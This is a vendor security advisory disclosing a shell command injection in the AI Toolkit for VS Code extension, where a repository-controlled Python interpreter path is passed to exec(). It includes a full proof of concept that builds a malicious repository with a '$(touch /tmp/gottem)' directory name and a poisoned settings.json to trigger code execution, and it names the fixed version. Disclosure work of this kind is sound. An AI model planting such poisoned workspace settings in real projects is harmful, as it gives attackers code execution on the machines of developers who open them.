Synopsis
Microsoft Foundry Toolkit for VS Code (formerly AI Toolkit for VS Code) uses child_process.exec() with string interpolation to build shell commands that include a Python interpreter path obtained from the Python extension API (ms-python.python via getExecutionDetails()).
The interpreter path can be controlled by a repository through .vscode/settings.json (python.defaultInterpreterPath). On Linux/macOS, this can be abused for shell command injection because the extension wraps the path in double quotes and passes it to exec() (which invokes a shell). Command substitution such as $(...) is evaluated inside double quotes by POSIX shells.
Proof of Concept
I validated arbitrary command execution on AI Toolkit version 0.31.2026021209 by pointing python.defaultInterpreterPath to a real Python interpreter located under a directory whose literal name contains $(touch /tmp/gottem)
Create the PoC repository and files:
mkdir -p malicious-project/.aitk malicious-project/.vscode
echo '{}' > malicious-project/.aitk/config.json
mkdir -p 'malicious-project/$(touch /tmp/gottem)'
ln -sf /usr/bin/python3 'malicious-project/$(touch /tmp/gottem)/python3'
Set the poisoned interpreter path using the absolute repository path:
REPO_PATH="$(cd malicious-project && pwd)"
# Note: \$ escapes the dollar sign so the literal string $(touch ...)
# ends up in the JSON, while ${REPO_PATH} expands to the real path.
cat > malicious-project/.vscode/settings.json << JSONEOF
{
"python.defaultInterpreterPath": "${REPO_PATH}/\$(touch /tmp/gottem)/python3"
}
JSONEOF
Open the repository in VS Code with AI Toolkit and Python extension installed:
code malicious-project/
In VS Code, click the AI Toolkit Testing view in the sidebar (the potion icon).
In the AI Toolkit Testing panel, click Run Evaluation in Foundry (this reaches pytest --collect-evals). No other files need to be opened first; the Python extension resolves the interpreter path from workspace settings when AI Toolkit requests it.
Verify execution:
ls -la /tmp/gottem
Solution
Upgrade to version 0.32.0 or later.
Additional References
https://marketplace.visualstudio.com/items?itemName=ms-windows-ai-studio.windows-ai-studioDisclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]
Tenable One
Request a demo
The world’s leading AI-powered exposure management platform.
Thank You
Thank you for your interest in Tenable One.
A representative will be in touch soon.
Form ID: 7469
Form Name: one-eval
Form Class: c-form form-panel__global-form c-form--mkto js-mkto-no-css js-form-hanging-label c-form--hide-comments
Form Wrapper ID: one-eval-form-wrapper
Confirmation Class: one-eval-confirmform-modal
Simulate Success